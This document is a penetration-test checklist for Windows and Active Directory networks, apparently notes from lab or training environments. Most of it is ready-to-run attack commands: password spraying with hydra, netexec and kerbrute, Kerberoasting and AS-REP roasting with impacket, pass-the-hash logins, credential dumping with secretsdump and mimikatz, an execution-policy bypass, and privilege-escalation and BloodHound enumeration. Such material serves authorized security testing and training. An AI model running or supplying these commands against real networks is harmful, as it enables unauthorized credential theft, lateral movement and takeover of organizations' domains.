Penetration Test Checklist

Unauthenticated Recon - Domain

• Create a target list.

• Check for AS-REPRoastable & Kerberoastable users.

• Bruteforce kerberos users via kerbrute.

Initial Compromise of Network

• nmap scan of internal network

• smb shares

• Check for AS-REPRoast & Kerberoastable users.

Windows Privilege Escalation

Checklist - Local Windows Privilege EscalationHackTricks

Harvested a New Credential

Make sure to test twice. Once for domain and once for "--local-auth" to test local user passwords.

Spray Passwords

• Copy

  $ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp

• Copy

  $ netexec smb ips.txt -u users.txt -p passwords.txt 

• Copy

  $ netexec winrm ips.txt -u users.txt -p passwords.txt

• Copy

  $ netexec wmi ips.txt -u users.txt -p passwords.txt 

• Copy

  $ netexec mssql ips.txt -u users.txt -p passwords.txt -local-auth

Manual Spray (if above didn't recover anything).

• Copy

  $ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"

• Copy

  $ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password

Harvested Domain Credential

Kerbrute

• Copy

  $ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Kerberoast

• Copy

  $ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc

ASREP Roast

• Copy

  $ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete

Harvest new Hash

• Check with crackstation

• Copy

  $ NetExec rdp 192.168.215.175 -u users.txt -H hashes.txt

Harvested a new Private Key

Spray Intranet (.ssh)

If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.

• Copy

  victim@host$ ssh -i id_rsa [email protected]

Popped a new Shell

Manual Enumeration

• Check ALL privileges "whoami /priv" for potential exploits

• Check for sensitive files

• Check for potential binary hijacking

• Check for scheduled tasks / services running under other users.

Domain Connected User

Check ACL's/ACE's

• bloodhound / sharphound

• powerview

PWNED Shell?- Dump Secrets!

• Copy

  $ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" [email protected]

• Copy

  PS> .\mimikatz.exe

Privilege Escalation - Windows

Automated Enumeration

• Copy

  PS> .\winPEASx64.exe

• Copy

  PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Manual Enumeration

• Copy

  systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"

• Copy

  whoami /priv

• Copy

  net user <user>

• Copy

  net localgroup administrators

• Copy

  cmd.exe /c dir /a C:\

• Copy

  ls "program files"

• Copy

  netstat -nao

• Copy

  .\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip

Active Directory Lateral Movement

• bloodhound / sharphound (Shortest path to high value targets)

• Certify / Certipy - Check for vulnerable ADCS's

• mimikatz

• netexec spray passwords & hashes

• NTLM Relay Attack

• Check for Service Accounts

• Kerberoast / AS-REPRoast

Crying for help?

• Check HackerRecipes